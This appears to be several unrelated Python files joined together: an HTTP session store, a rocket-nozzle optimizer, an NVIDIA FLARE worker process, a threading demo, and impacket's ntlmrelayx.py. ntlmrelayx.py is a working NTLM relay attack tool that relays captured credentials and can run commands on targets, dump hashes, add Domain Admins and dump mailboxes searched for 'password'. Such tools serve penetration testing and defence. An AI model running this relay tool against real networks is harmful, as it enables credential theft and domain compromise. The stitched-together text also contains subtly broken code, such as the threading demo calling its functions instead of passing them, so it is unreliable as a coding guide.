# -*- coding: utf-8 -*- """ Parameters ---------- Returns ------- :Author: MaTianGe :Create: 2021/1/28 13:20 :Blog: https://safe.shougang.com.cn Copyright (c) 2021/1/28, ShouAnYun Group All Rights Reserved. """ import threading import uuid import time from typing import Any, Dict, Tuple from threading import RLock from simple_http_server import Session, SessionFactory, set_session_factory from simple_http_server.ignore.logger import get_logger _logger = get_logger("http_session") _SESSION_TIME_CLEANING_INTERVAL = 60*60*2 SESSION_COOKIE_NAME: str = "PY_SIM_HTTP_SER_SESSION_ID" def _get_from_dict(adict: Dict[str, Any], key: str) -> Any: if key not in adict: return None try: return adict[key] except KeyError: _logger.debug("key %s was deleted in other thread.") return None class LocalSessionImpl(Session): def __init__(self, id: str, creation_time: float, session_fac: SessionFactory): super().__init__() self.__id = id self.__creation_time = creation_time self.__last_acessed_time = creation_time self.__is_new = True self.__attr_lock = RLock() self.__attrs = {} self.__ses_fac = session_fac @property def id(self) -> str: return self.__id @property def creation_time(self) -> float: return self.__creation_time @property def last_acessed_time(self) -> float: return self.__last_acessed_time @property def is_new(self) -> bool: return self.__is_new def _set_last_acessed_time(self, last_acessed_time: float): self.__last_acessed_time = last_acessed_time self.__is_new = False @property def attribute_names(self) -> Tuple: return tuple(self.__attrs.keys()) def get_attribute(self, name: str) -> Any: return _get_from_dict(self.__attrs, name) def set_attribute(self, name: str, value: Any) -> None: with self.__attr_lock: self.__attrs[name] = value def invalidate(self) -> None: self._set_last_acessed_time(0) self.__ses_fac.clean_session(session_id=self.id) class LocalSessionFactory(SessionFactory): def __init__(self): self.__sessions: Dict[str, LocalSessionImpl] = {} self.__session_lock = RLock() self.__started = False self.__clearing_thread = threading.Thread(target=self._clear_time_out_session_in_bg, daemon=True) def _start_cleaning(self): if not self.__started: self.__started = True self.__clearing_thread.start() def _create_local_session(self, session_id: str) -> Session: if session_id: sid = session_id else: sid = uuid.uuid4().hex return LocalSessionImpl(sid, time.time(), self) def _clear_time_out_session_in_bg(self): while True: time.sleep(_SESSION_TIME_CLEANING_INTERVAL) self._clear_time_out_session() def _clear_time_out_session(self): cl_ids = [] for k, v in self.__sessions.items(): if not v.is_valid: cl_ids.append(k) for k in cl_ids: self.clean_session(k) def clean_session(self, session_id: str): if session_id in self.__sessions: try: _logger.debug("session[#%s] is being cleaned" % session_id) sess = self.__sessions[session_id] if not sess.is_valid: del self.__sessions[session_id] except KeyError: _logger.debug("Session[#%s] in session cache is already deleted. " % session_id) def _get_session(self, session_id: str) -> LocalSessionImpl: if not session_id: return None sess: LocalSessionImpl = _get_from_dict(self.__sessions, session_id) if sess and sess.is_valid: return sess else: return None def get_session(self, session_id: str, create: bool = False) -> Session: sess = self._get_session(session_id) if sess: sess._set_last_acessed_time(time.time()) return sess with self.__session_lock: session = self._create_local_session(session_id) self.__sessions[session.id] = session self._start_cleaning() return session set_session_factory(LocalSessionFactory())
aerospike_optimizer.py
import numpy as np import matplotlib.pyplot as plt import scipy.optimize import multiprocessing as mp import copy import pickle import gasdynamics as gd from heat_flux import heat_flux from plug_nozzle_angelino import plug_nozzle import MOC ## NASA CEA CONSTANTS class CEA_constants(): def __init__(self,altitude): """Class that should eventually queery NASA CEA data, for now holds all values constant Args: altitude (float): altitude in meters Returns: Stores NASA CEA data in atributes """ self.gamma = 1.237 #np.mean([1.2534,1.2852]) self.T_c = 2831.47 # combustion chamber temperature self.p_c = 3102640.8 # combustion chamber pressure self.rho_c = 3.3826 # combustion chamber density self.a_c = np.sqrt(self.gamma*(1-1/self.gamma)*200.07*self.T_c) # combustion chamber sound speed self.Pr = 0.55645 #average throat to exit Prandtl's number self.cp = 1.724 #[KJ/KG-K] average throat to exit constant pressure heat capacity self.c = 0.003883468 #[millipoise/K^w] viscocity to temperature coefficient self.w = 0.678083301 #viscocity to temperature exponent class aerospike_optimizer(): """Class intended to be used to optimize an aerospike nozzle Args: r_e (float): outer radius of aerospike nozzle T_w (float): desired nozzle temperatures alpha (float): weighting of thrust beta (float): weighting of cooling requirement design_alt_init (float): initial design altitude truncate_ratio_init (float): inital truncation length chr_mesh_n (int): number of expansion waves for MOC no_alt_range (float): number of altitude ranges to optimize over no_core (int>0): number of cores to be used in computation Returns: cost_opt_contour_params (float): cost computed with spike.x and spike.y as input parameters cost_opt_design_params (float): cost computed with design_alt and truncate_ratio as input parameters """ def __init__(self,r_e,T_w,alpha,beta,design_alt_init,truncate_ratio_init,chr_mesh_n=120,no_alt_range = 30,no_core=1): self.r_e = r_e self.T_w = T_w self.alpha = alpha self.beta = beta self.design_alt_init = design_alt_init self.truncate_ratio_init = truncate_ratio_init self.chr_mesh_n = chr_mesh_n self.no_alt_range_int = int(no_core*round(no_alt_range/no_core)) self.no_core = no_core self.CEA = CEA_constants(0) self.spike_init = self.__design_angelino_nozzle(design_alt_init,truncate_ratio_init,self.CEA,r_e) self.spike_opt = copy.deepcopy(self.spike_init) def __compute_thrust_over_range(self,plug_nozzle_class,alt_range,gamma,send_end,downstream_factor=1.2,chr_mesh_n=50): """Function that computes the thrust at each point over a specified range, intended to be used as apart of a process Args: plug_nozzle_class (class plug_nozzle_angelino.plug_nozzle): the plug nozzle for which the thrust is to be computed alt_range (np.array): discrete altitudes over which thrust should be computed gamma (float): ratio of specifc heats send_end (class multiprocessing.connection.Connection): part of recv_end, send_end pair indicating which recv_end to send to downstream_factor (float): specifies what factor downstream of the final contour point MOC should be continued up to chr_mesh_n (int>0): specifies number expansion waves at lip for MOC Returns: None send_end.send(thrust_range); thrust_range (np.array): contains thrust computed at each alt_range point """ thrust_range = np.zeros(alt_range.shape) for i in range(alt_range.shape[0]): # print(alt_range[i]) MOC_mesh = MOC.chr_mesh(plug_nozzle_class,gamma,alt_range[i],chr_mesh_n,downstream_factor=downstream_factor) thrust_range[i] = MOC_mesh.compute_thrust('linear',200) print(thrust_range[i]) # except: # print("goofs and gafs") # thrust_range[i] = 0 send_end.send(thrust_range) def __multicore_thrust_compute(self,plug_nozzle_class,altitude_range,gamma,downstream_factor=1.2,chr_mesh_n=50,no_core=1): proc_list = [] pipe_list =[] alt_range_split = np.split(altitude_range,no_core) for i in range(no_core): recv_end, send_end = mp.Pipe(False) args = (plug_nozzle_class,alt_range_split[i],gamma,send_end,downstream_factor,chr_mesh_n) proc = mp.Process(target=self.__compute_thrust_over_range, args = args) proc_list.append(proc) pipe_list.append(recv_end) proc.start() for proc in proc_list: proc.join() thrust_range = [x.recv() for x in pipe_list] thrust_range = np.concatenate(thrust_range) plt.plot(altitude_range,thrust_range,'o') # for thread in threads: # thread.map return thrust_range def __design_angelino_nozzle(self,design_alt,truncate_ratio,CEA,r_e): """ Can be a class function, will edit going forwards """ (p_atm,T_atm,rho_atm) = gd.standard_atmosphere([design_alt]) PR = CEA.p_c/p_atm M_e = gd.PR_expansion_mach(PR,CEA.gamma) expansion_ratio = gd.expansion_ratio(1,M_e,CEA.gamma)#6.64 #8.1273 # print('Exp. ratio: ' + str(expansion_ratio)) # print('PR: ' + str(PR)) A_t = r_e**2*np.pi/expansion_ratio # max expansion (r_b = 0, r_e**2 >= A_t*expansion_ratio/np.pi) return plug_nozzle(expansion_ratio,A_t,r_e,CEA.gamma,CEA.T_c,CEA.p_c,CEA.a_c,CEA.rho_c,1500,truncate_ratio = truncate_ratio) def __cost_end_func(self,no_alt_range_int,spike,CEA,downstream_factor=1.2,chr_mesh_n=120,no_core=1): alt_range = np.linspace(0,9144,no_alt_range_int) # shuffle arrays so each core computes similar complexity on average np.random.shuffle(alt_range) (p_atm_r,T_atm_r,rho_atm_r) = gd.standard_atmosphere(alt_range) thrust_range = self.__multicore_thrust_compute(spike,alt_range,CEA.gamma,downstream_factor=downstream_factor,chr_mesh_n=chr_mesh_n,no_core=no_core) # unshuffle arrays ordered_idx = np.argsort(alt_range) alt_range = alt_range[ordered_idx]; thrust_range = thrust_range[ordered_idx] work = np.trapz(thrust_range,alt_range) plt.plot(alt_range,thrust_range,'o') plt.show() print('work = ' + str(work)) ## heat transfer required total_heat_flux = heat_flux(CEA.Pr,CEA.cp,CEA.gamma,CEA.c,CEA.w,CEA.T_c,T_w,spike) return (work, total_heat_flux) def __cost_func_contour_params(self,params,spike,T_w,CEA,alpha,beta,chr_mesh_n,no_alt_range_int,no_core): params = np.asarray(params) if len(params.shape) > 1: raise ValueError('Input params not correct shape. Should be 1D array') x_vals,y_vals = np.split(params,2) spike.x = x_vals; spike.y = y_vals work, total_heat_flux = self.__cost_end_func(no_alt_range_int,spike,CEA,downstream_factor=5.0,chr_mesh_n=chr_mesh_n,no_core=no_core) print('Total Heat = ' +str(total_heat_flux)) return -alpha*work + beta*total_heat_flux def __cost_func_design_params(self,params,T_w,CEA,r_e,alpha,beta,chr_mesh_n,no_alt_range_int,no_core): params = np.asarray(params) if len(params.shape) > 1: raise ValueError('Input params not correct shape. Should be 1D array') design_alt, truncate_ratio = np.split(params,2) spike = self.__design_angelino_nozzle(design_alt,truncate_ratio,CEA,r_e) work, total_heat_flux = self.__cost_end_func(no_alt_range_int,spike,CEA,downstream_factor=1.2,chr_mesh_n=chr_mesh_n,no_core=no_core) print('work = ' + str(work)) return -alpha*work + beta*total_heat_flux def cost_opt_contour_params(self,params): """params = np.concatenate((spike_opt.x,spike_opt.y)) """ return self.__cost_func_contour_params(params,self.spike_opt,self.T_w,self.CEA,self.alpha,self.beta,self.chr_mesh_n,self.no_alt_range_int,self.no_core) def cost_opt_design_params(self,params): """params = [design_alt,truncation_ratio] """ return self.__cost_func_design_params(params,self.T_w,self.CEA,self.r_e,self.alpha,self.beta,self.chr_mesh_n,self.no_alt_range_int,self.no_core) if __name__ == '__main__': ## CONSTANTS OF DESIGN FOR AERODYNAMICS r_e = 0.027 #0.034 # likely too large ## CONSTANTS OF DESIGN FOR HEAT FLUX #user input variable in metric units: T_w=600 #[K] desired temperature of nozzle ## CONSTANTS OF SIM alpha = 1#0.07/8 # 0.07/8 : 1 ratio of alpha : beta gives very similar weights beta = 0#1 design_alt = 9144 truncate_ratio = 1# bounds on truncate < 0.1425 CEA = CEA_constants(0) # not a functioning class as of now optimizer = aerospike_optimizer(r_e,T_w,alpha,beta,design_alt,truncate_ratio,chr_mesh_n=150,no_alt_range =16,no_core=4) def old_vs_new_spike(): optimizer = aerospike_optimizer(r_e,T_w,alpha,beta,design_alt,truncate_ratio,chr_mesh_n=100,no_alt_range = 32,no_core=4) contours = np.concatenate((optimizer.spike_opt.x,optimizer.spike_opt.y)) #optimizer_old = aerospike_optimizer(r_e,T_w,alpha,beta,6000,truncate_ratio,chr_mesh_n=120,no_alt_range=32,no_core=4) optimizer_old = aerospike_optimizer(r_e,T_w,alpha,beta,6000,truncate_ratio,chr_mesh_n=100,no_alt_range = 32,no_core=4) contours = np.concatenate((optimizer_old.spike_opt.x,optimizer_old.spike_opt.y)) #optimizer_old = aerospike_optimizer(r_e,T_w,alpha,beta,6000,truncate_ratio,chr_mesh_n=120,no_alt_range=32,no_core=4) # print(optimizer_old.cost_opt_contour_params(contours)) # print(optimizer.cost_opt_contour_params(contours)) #print(optimizer.cost_opt_design_params([design_alt,truncate_ratio])) #plt.legend() plt.plot(optimizer.spike_init.x,optimizer.spike_init.y,'b-',optimizer.spike_init.lip_x,optimizer.spike_init.lip_y,'bx',label='Optimized Spike') plt.plot(optimizer_old.spike_init.x,optimizer_old.spike_init.y,'r--',optimizer_old.spike_init.lip_x,optimizer_old.spike_init.lip_y,'rx',label='Old Spike') plt.plot([optimizer_old.spike_init.x[-1],optimizer_old.spike_init.x[-1]],[optimizer_old.spike_init.y[-1],0],'r--') plt.plot([optimizer.spike_init.x[-1],optimizer.spike_init.x[-1]],[optimizer.spike_init.y[-1],0],'b-') plt.plot(optimizer.spike_init.x,np.zeros(optimizer.spike_init.x.shape),'k-') plt.axis('equal') plt.legend() plt.show() # def cost_opt_design_params(params) : return cost_func_design_params(params,T_w,CEA,r_e,alpha,beta,chr_mesh_n=30,no_core=4) # old_vs_new_spike() optimizer.cost_opt_design_params([design_alt,truncate_ratio]) # print(cost_opt_contour_params(np.concatenate((spike_opt.x,spike_opt.y)))) #res = scipy.optimize.minimize(optimizer.cost_opt_contour_params,contours)#,constraints = cons) # with open('spike_opt.pkl','wb') as output: # pickle.dump(spike_opt,output,pickle.HIGHEST_PROTOCOL) # with open('spike_points.pkl','wb') as output: # pickle.dump(res,output,pikcle.HIGHEST_PROTOCOL) # with open('meshes.pkl','rb') as input: # meshes = pickle.load(input) ## CONVERTING TO OPTIMIZABLE FUNCTION # def min_design_alt(X): # return X[0] - 3000 # def max_design_alt(X): # return -X[0] + 12000 # def min_truncate(X): # return X[1] - 0.2 # def max_truncate(X): # return -X[1] + 1 # cons = [{'type':'ineq', 'fun':min_design_alt},{'type':'ineq', 'fun':max_design_alt},{'type':'ineq', 'fun':min_truncate},{'type':'ineq', 'fun':max_truncate}] # minmizer_kwargs = {"constraints":cons} # res = scipy.optimize.basinhopping(cost_lambda,[design_alt,truncate_ratio],minimizer_kwargs=minmizer_kwargs) # print(res)
ntlmrelayx.py
#!/usr/bin/env python # SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved. # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # Generic NTLM Relay Module # # Authors: # Alberto Solino (@agsolino) # Dirk-jan Mollema / Fox-IT (https://www.fox-it.com) # # Description: # This module performs the SMB Relay attacks originally discovered # by cDc extended to many target protocols (SMB, MSSQL, LDAP, etc). # It receives a list of targets and for every connection received it # will choose the next target and try to relay the credentials. Also, if # specified, it will first to try authenticate against the client connecting # to us. # # It is implemented by invoking a SMB and HTTP Server, hooking to a few # functions and then using the specific protocol clients (e.g. SMB, LDAP). # It is supposed to be working on any LM Compatibility level. The only way # to stop this attack is to enforce on the server SPN checks and or signing. # # If the authentication against the targets succeeds, the client authentication # succeeds as well and a valid connection is set against the local smbserver. # It's up to the user to set up the local smbserver functionality. One option # is to set up shares with whatever files you want to so the victim thinks it's # connected to a valid SMB server. All that is done through the smb.conf file or # programmatically. # import argparse import sys import logging import cmd import urllib2 import json from threading import Thread from impacket import version from impacket.examples import logger from impacket.examples.ntlmrelayx.servers import SMBRelayServer, HTTPRelayServer from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor, TargetsFileWatcher from impacket.examples.ntlmrelayx.servers.socksserver import SOCKS RELAY_SERVERS = ( SMBRelayServer, HTTPRelayServer ) class MiniShell(cmd.Cmd): def __init__(self, relayConfig, threads): cmd.Cmd.__init__(self) self.prompt = 'ntlmrelayx> ' self.tid = None self.relayConfig = relayConfig self.intro = 'Type help for list of commands' self.relayThreads = threads self.serversRunning = True @staticmethod def printTable(items, header): colLen = [] for i, col in enumerate(header): rowMaxLen = max([len(row[i]) for row in items]) colLen.append(max(rowMaxLen, len(col))) outputFormat = ' '.join(['{%d:%ds} ' % (num, width) for num, width in enumerate(colLen)]) # Print header print outputFormat.format(*header) print ' '.join(['-' * itemLen for itemLen in colLen]) # And now the rows for row in items: print outputFormat.format(*row) def emptyline(self): pass def do_targets(self, line): for url in self.relayConfig.target.originalTargets: print url.geturl() return def do_socks(self, line): headers = ["Protocol", "Target", "Username", "Port"] url = "http://localhost:9090/ntlmrelayx/api/v1.0/relays" try: proxy_handler = urllib2.ProxyHandler({}) opener = urllib2.build_opener(proxy_handler) response = urllib2.Request(url) r = opener.open(response) result = r.read() items = json.loads(result) except Exception, e: logging.error("ERROR: %s" % str(e)) else: if len(items) > 0: self.printTable(items, header=headers) else: logging.info('No Relays Available!') def do_startservers(self, line): if not self.serversRunning: start_servers(options, self.relayThreads) self.serversRunning = True logging.info('Relay servers started') else: logging.error('Relay servers are already running!') def do_stopservers(self, line): if self.serversRunning: stop_servers(self.relayThreads) self.serversRunning = False logging.info('Relay servers stopped') else: logging.error('Relay servers are already stopped!') def do_exit(self, line): print "Shutting down, please wait!" return True def start_servers(options, threads): for server in RELAY_SERVERS: #Set up config c = NTLMRelayxConfig() c.setProtocolClients(PROTOCOL_CLIENTS) c.setRunSocks(options.socks, socksServer) c.setTargets(targetSystem) c.setExeFile(options.e) c.setCommand(options.c) c.setEnumLocalAdmins(options.enum_local_admins) c.setEncoding(codec) c.setMode(mode) c.setAttacks(PROTOCOL_ATTACKS) c.setLootdir(options.lootdir) c.setOutputFile(options.output_file) c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.escalate_user) c.setMSSQLOptions(options.query) c.setInteractive(options.interactive) c.setIMAPOptions(options.keyword, options.mailbox, options.all, options.imap_max) c.setIPv6(options.ipv6) c.setWpadOptions(options.wpad_host, options.wpad_auth_num) c.setSMB2Support(options.smb2support) c.setInterfaceIp(options.interface_ip) #If the redirect option is set, configure the HTTP server to redirect targets to SMB if server is HTTPRelayServer and options.r is not None: c.setMode('REDIRECT') c.setRedirectHost(options.r) #Use target randomization if configured and the server is not SMB #SMB server at the moment does not properly store active targets so selecting them randomly will cause issues if server is not SMBRelayServer and options.random: c.setRandomTargets(True) s = server(c) s.start() threads.add(s) return c def stop_servers(threads): todelete = [] for thread in threads: if isinstance(thread, RELAY_SERVERS): thread.server.shutdown() todelete.append(thread) # Now remove threads from the set for thread in todelete: threads.remove(thread) del thread # Process command-line arguments. if __name__ == '__main__': # Init the example's logger theme logger.init() print version.BANNER #Parse arguments parser = argparse.ArgumentParser(add_help = False, description = "For every connection received, this module will " "try to relay that connection to specified target(s) system or the original client") parser._optionals.title = "Main options" #Main arguments parser.add_argument("-h","--help", action="help", help='show this help message and exit') parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON') parser.add_argument('-t',"--target", action='store', metavar = 'TARGET', help='Target to relay the credentials to, ' 'can be an IP, hostname or URL like smb://server:445 If unspecified, it will relay back to the client') parser.add_argument('-tf', action='store', metavar = 'TARGETSFILE', help='File that contains targets by hostname or ' 'full URL, one per line') parser.add_argument('-w', action='store_true', help='Watch the target file for changes and update target list ' 'automatically (only valid with -tf)') parser.add_argument('-i','--interactive', action='store_true',help='Launch an smbclient console instead' 'of executing a command after a successful relay. This console will listen locally on a ' ' tcp port and can be reached with for example netcat.') # Interface address specification parser.add_argument('-ip','--interface-ip', action='store', metavar='INTERFACE_IP', help='IP address of interface to ' 'bind SMB and HTTP servers',default='') parser.add_argument('-ra','--random', action='store_true', help='Randomize target selection (HTTP server only)') parser.add_argument('-r', action='store', metavar = 'SMBSERVER', help='Redirect HTTP requests to a file:// path on SMBSERVER') parser.add_argument('-l','--lootdir', action='store', type=str, required=False, metavar = 'LOOTDIR',default='.', help='Loot ' 'directory in which gathered loot such as SAM dumps will be stored (default: current directory).') parser.add_argument('-of','--output-file', action='store',help='base output filename for encrypted hashes. Suffixes ' 'will be added for ntlm and ntlmv2') parser.add_argument('-codec', action='store', help='Sets encoding used (codec) from the target\'s output (default ' '"%s"). If errors are detected, run chcp.com at the target, ' 'map the result with ' 'https://docs.python.org/2.4/lib/standard-encodings.html and then execute ntlmrelayx.py ' 'again with -codec and the corresponding codec ' % sys.getdefaultencoding()) parser.add_argument('-smb2support', action="store_true", default=False, help='SMB2 Support (experimental!)') parser.add_argument('-socks', action='store_true', default=False, help='Launch a SOCKS proxy for the connection relayed') parser.add_argument('-wh','--wpad-host', action='store',help='Enable serving a WPAD file for Proxy Authentication attack, ' 'setting the proxy host to the one supplied.') parser.add_argument('-wa','--wpad-auth-num', action='store',help='Prompt for authentication N times for clients without MS16-077 installed ' 'before serving a WPAD file.') parser.add_argument('-6','--ipv6', action='store_true',help='Listen on both IPv6 and IPv4') #SMB arguments smboptions = parser.add_argument_group("SMB client options") smboptions.add_argument('-e', action='store', required=False, metavar = 'FILE', help='File to execute on the target system. ' 'If not specified, hashes will be dumped (secretsdump.py must be in the same directory)') smboptions.add_argument('-c', action='store', type=str, required=False, metavar = 'COMMAND', help='Command to execute on ' 'target system. If not specified, hashes will be dumped (secretsdump.py must be in the same ' 'directory).') smboptions.add_argument('--enum-local-admins', action='store_true', required=False, help='If relayed user is not admin, attempt SAMR lookup to see who is (only works pre Win 10 Anniversary)') #MSSQL arguments mssqloptions = parser.add_argument_group("MSSQL client options") mssqloptions.add_argument('-q','--query', action='append', required=False, metavar = 'QUERY', help='MSSQL query to execute' '(can specify multiple)') #LDAP options ldapoptions = parser.add_argument_group("LDAP client options") ldapoptions.add_argument('--no-dump', action='store_false', required=False, help='Do not attempt to dump LDAP information') ldapoptions.add_argument('--no-da', action='store_false', required=False, help='Do not attempt to add a Domain Admin') ldapoptions.add_argument('--no-acl', action='store_false', required=False, help='Disable ACL attacks') ldapoptions.add_argument('--escalate-user', action='store', required=False, help='Escalate privileges of this user instead of creating a new one') #IMAP options imapoptions = parser.add_argument_group("IMAP client options") imapoptions.add_argument('-k','--keyword', action='store', metavar="KEYWORD", required=False, default="password", help='IMAP keyword to search for. ' 'If not specified, will search for mails containing "password"') imapoptions.add_argument('-m','--mailbox', action='store', metavar="MAILBOX", required=False, default="INBOX", help='Mailbox name to dump. Default: INBOX') imapoptions.add_argument('-a','--all', action='store_true', required=False, help='Instead of searching for keywords, ' 'dump all emails') imapoptions.add_argument('-im','--imap-max', action='store',type=int, required=False,default=0, help='Max number of emails to dump ' '(0 = unlimited, default: no limit)') try: options = parser.parse_args() except Exception as e: logging.error(str(e)) sys.exit(1) if options.debug is True: logging.getLogger().setLevel(logging.DEBUG) else: logging.getLogger().setLevel(logging.INFO) logging.getLogger('impacket.smbserver').setLevel(logging.ERROR) # Let's register the protocol clients we have # ToDo: Do this better somehow from impacket.examples.ntlmrelayx.clients import PROTOCOL_CLIENTS from impacket.examples.ntlmrelayx.attacks import PROTOCOL_ATTACKS if options.codec is not None: codec = options.codec else: codec = sys.getdefaultencoding() if options.target is not None: logging.info("Running in relay mode to single host") mode = 'RELAY' targetSystem = TargetsProcessor(singleTarget=options.target, protocolClients=PROTOCOL_CLIENTS) else: if options.tf is not None: #Targetfile specified logging.info("Running in relay mode to hosts in targetfile") targetSystem = TargetsProcessor(targetListFile=options.tf, protocolClients=PROTOCOL_CLIENTS) mode = 'RELAY' else: logging.info("Running in reflection mode") targetSystem = None mode = 'REFLECTION' if options.r is not None: logging.info("Running HTTP server in redirect mode") if targetSystem is not None and options.w: watchthread = TargetsFileWatcher(targetSystem) watchthread.start() threads = set() socksServer = None if options.socks is True: # Start a SOCKS proxy in the background socksServer = SOCKS() socksServer.daemon_threads = True socks_thread = Thread(target=socksServer.serve_forever) socks_thread.daemon = True socks_thread.start() threads.add(socks_thread) c = start_servers(options, threads) print "" logging.info("Servers started, waiting for connections") try: if options.socks: shell = MiniShell(c, threads) shell.cmdloop() else: sys.stdin.read() except KeyboardInterrupt: pass else: pass if options.socks is True: socksServer.shutdown() del socksServer for s in threads: del s sys.exit(0)
sub_worker_process.py
# Copyright (c) 2021-2022, NVIDIA CORPORATION. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import argparse import copy import os import threading import time import traceback from multiprocessing.connection import Listener, Client from nvflare.fuel.sec.security_content_service import SecurityContentService from nvflare.apis.fl_component import FLComponent from nvflare.apis.fl_constant import FLContextKey from nvflare.apis.fl_context import FLContext from nvflare.apis.signal import Signal from nvflare.apis.utils.fl_context_utils import get_serializable_data from nvflare.fuel.common.multi_process_executor_constants import CommunicateData, CommunicationMetaData from nvflare.private.fed.client.client_run_manager import ClientRunManager class EventRelayer(FLComponent): def __init__(self, conn, local_rank): super().__init__() self.conn = conn self.local_rank = local_rank self.event_lock = threading.Lock() def relay_event(self, run_manager, data): with run_manager.new_context() as fl_ctx: event_type = data[CommunicationMetaData.EVENT_TYPE] fl_ctx.props.update(data[CommunicationMetaData.FL_CTX].props) fl_ctx.set_prop( FLContextKey.EVENT_ORIGIN_SITE, CommunicateData.MULTI_PROCESS_EXECUTOR, private=True, sticky=False ) self.fire_event(event_type=event_type, fl_ctx=fl_ctx) def handle_event(self, event_type: str, fl_ctx: FLContext): event_site = fl_ctx.get_prop(FLContextKey.EVENT_ORIGIN_SITE) new_fl_ctx = FLContext() new_fl_ctx.props.update(copy.deepcopy(get_serializable_data(fl_ctx).props)) if event_site != CommunicateData.MULTI_PROCESS_EXECUTOR: with self.event_lock: try: data = { CommunicationMetaData.EVENT_TYPE: event_type, CommunicationMetaData.RANK_NUMBER: self.local_rank, CommunicationMetaData.FL_CTX: new_fl_ctx, } self.conn.send(data) return_data = self.conn.recv() # update the fl_ctx from the child process return data. fl_ctx.props.update(return_data[CommunicationMetaData.FL_CTX].props) except BaseException: self.log_warning( fl_ctx, f"Failed to relay the event to parent process. Event: {event_type}", fire_event=False ) def main(): parser = argparse.ArgumentParser() parser.add_argument("--workspace", "-m", type=str, help="WORKSPACE folder", required=True) # parser.add_argument("--parent_port", type=str, help="Parent listen port", required=True) parser.add_argument("--ports", type=str, help="Listen ports", required=True) # parser.add_argument("--local_rank", type=int, default=0) args = parser.parse_args() listen_ports = list(map(int, args.ports.split("-"))) # parent_port = args.parent_port startup = os.path.join(args.workspace, "startup") SecurityContentService.initialize(content_folder=startup) # local_rank = args.local_rank local_rank = int(os.environ["LOCAL_RANK"]) listen_port = listen_ports[local_rank * 3] exe_conn = _create_connection(listen_port) listen_port = listen_ports[local_rank * 3 + 1] handle_conn = _create_connection(listen_port) listen_port = listen_ports[local_rank * 3 + 2] event_conn = None while not event_conn: try: address = ("localhost", listen_port) event_conn = Client(address, authkey=CommunicationMetaData.PARENT_PASSWORD.encode()) except Exception as e: time.sleep(1.0) pass data = exe_conn.recv() client_name = data[CommunicationMetaData.FL_CTX].get_prop(FLContextKey.CLIENT_NAME) run_number = data[CommunicationMetaData.FL_CTX].get_prop(FLContextKey.CURRENT_RUN) workspace = data[CommunicationMetaData.FL_CTX].get_prop(FLContextKey.WORKSPACE_OBJECT) run_manager = ClientRunManager( client_name=client_name, run_num=int(run_number), workspace=workspace, client=None, components=data[CommunicationMetaData.COMPONENTS], handlers=data[CommunicationMetaData.HANDLERS], conf=None, ) relayer = EventRelayer(event_conn, local_rank) run_manager.add_handler(relayer) run_manager.components[CommunicationMetaData.RELAYER] = relayer executor = data[CommunicationMetaData.LOCAL_EXECUTOR] exe_conn.send({CommunicationMetaData.RANK_PROCESS_STARTED: True}) exe_thread = threading.Thread(target=execute, args=(run_manager, local_rank, exe_conn, executor)) exe_thread.start() event_thread = threading.Thread(target=handle_event, args=(run_manager, local_rank, handle_conn)) event_thread.start() with run_manager.new_context() as fl_ctx: fl_ctx.set_prop(FLContextKey.RANK_NUMBER, local_rank, private=True, sticky=True) num_of_processes = int(len(listen_ports) / 3) fl_ctx.set_prop(FLContextKey.NUM_OF_PROCESSES, num_of_processes, private=True, sticky=True) exe_thread.join() event_thread.join() def _create_connection(listen_port): address = ("localhost", int(listen_port)) listener = Listener(address, authkey=CommunicationMetaData.CHILD_PASSWORD.encode()) conn = listener.accept() return conn def execute(run_manager, local_rank, exe_conn, executor): try: abort_signal = None while True: data = exe_conn.recv() command = data[CommunicationMetaData.COMMAND] if command == CommunicateData.EXECUTE: with run_manager.new_context() as fl_ctx: abort_signal = Signal() task_name = data[CommunicationMetaData.TASK_NAME] shareable = data[CommunicationMetaData.SHAREABLE] fl_ctx.props.update(data[CommunicationMetaData.FL_CTX].props) shareable = executor.execute( task_name=task_name, shareable=shareable, fl_ctx=fl_ctx, abort_signal=abort_signal ) if local_rank == 0: return_data = { CommunicationMetaData.SHAREABLE: shareable, CommunicationMetaData.FL_CTX: get_serializable_data(fl_ctx), } exe_conn.send(return_data) elif command == CommunicateData.CLOSE: if abort_signal: abort_signal.trigger(True) break except Exception: traceback.print_exc() print("If you abort client you can ignore this exception.") def handle_event(run_manager, local_rank, exe_conn): try: while True: data = exe_conn.recv() command = data[CommunicationMetaData.COMMAND] if command == CommunicateData.HANDLE_EVENT: event_relayer = run_manager.get_component(CommunicationMetaData.RELAYER) event_relayer.relay_event(run_manager, data) fl_ctx = data[CommunicationMetaData.FL_CTX] if local_rank == 0: return_data = {CommunicationMetaData.FL_CTX: get_serializable_data(fl_ctx)} exe_conn.send(return_data) elif command == CommunicateData.CLOSE: break except Exception: traceback.print_exc() print("If you abort client you can ignore this exception.") if __name__ == "__main__": """ This is the program for running rank processes in multi-process mode. """ main()
threading1.py
import threading def thread_job(): print("This is an added Thread, number is %s" % threading.current_thread()) # pass def thread_job2(): print("why only first thread") def main(): # 添加一个线程 added_thread = threading.Thread(target=thread_job()) added_thread2 = threading.Thread(target=thread_job2()) added_thread2.start() added_thread.start() print(threading.active_count()) print(threading.enumerate()) print(threading.current_thread()) if __name__ == '__main__': main()
exp_dispersion_cb.py
